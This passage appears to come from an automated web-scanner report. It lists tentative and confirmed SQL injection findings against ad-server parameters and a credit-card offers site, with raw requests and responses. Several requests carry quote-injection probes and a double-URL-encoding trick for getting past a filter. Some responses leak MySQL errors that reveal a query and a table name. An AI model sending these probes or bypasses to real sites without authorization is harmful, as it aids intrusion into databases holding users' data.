Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.11. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The u_cd parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_cd parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the u_cd request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32%2527&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:18:58 GMT
Server: cafe
Cache-Control: private
Content-Length: 8358
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">
<!-- Code auto-generated on T
...[SNIP]...
ash"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32%2527%2527&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.12. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32'&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:19:29 GMT
Server: cafe
Cache-Control: private
Content-Length: 8434
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">
<!-- Code auto-generated on T
...[SNIP]...
ash"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32''&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.13. http://googleads.g.doubleclick.net/pagead/ads [u_java parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The u_java parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_java parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1'&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:15:56 GMT
Server: cafe
Cache-Control: private
Content-Length: 8434
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">
<!-- Code auto-generated on T
...[SNIP]...
ash"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1''&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.14. http://googleads.g.doubleclick.net/pagead/ads [u_tz parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The u_tz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_tz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300'&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:14:02 GMT
Server: cafe
Cache-Control: private
Content-Length: 8072
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">
<!-- Code auto-generated on
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300''&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.15. http://googleads.g.doubleclick.net/pagead/ads [xpc parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The xpc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the xpc parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2'&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 12:25:17 GMT
Server: cafe
Cache-Control: private
Content-Length: 8072
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0">
<!-- Code auto-generated on
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2''&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.16. http://www.creditcards.com/oc/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc/?1'=1 HTTP/1.1
Host: www.creditcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:23:04 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3549
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 12:23:05 GMT; path=/
Connection: close

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '1'=1'; File: /usr/local/apache2/htdocs/us_pr
...[SNIP]...

Request 2

GET /oc/?1''=1 HTTP/1.1
Host: www.creditcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:23:05 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=10&evid=101110617071219b8fa6e37e56ae1efc&ref=&oid=1012011061707230533052891&data3=0&sid=1889&c=1%27%27%3D1
Vary: Accept-Encoding
Content-Length: 2733
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 12:23:05 GMT; path=/
Connection: close

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

1.17. http://www.creditcards.com/oc/ [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc/?pid=22105561'&pg=17&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:13 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3607
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:13 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''22105561''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '22105561''; File: /usr/local/apach
...[SNIP]...

Request 2

GET /oc/?pid=22105561''&pg=17&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
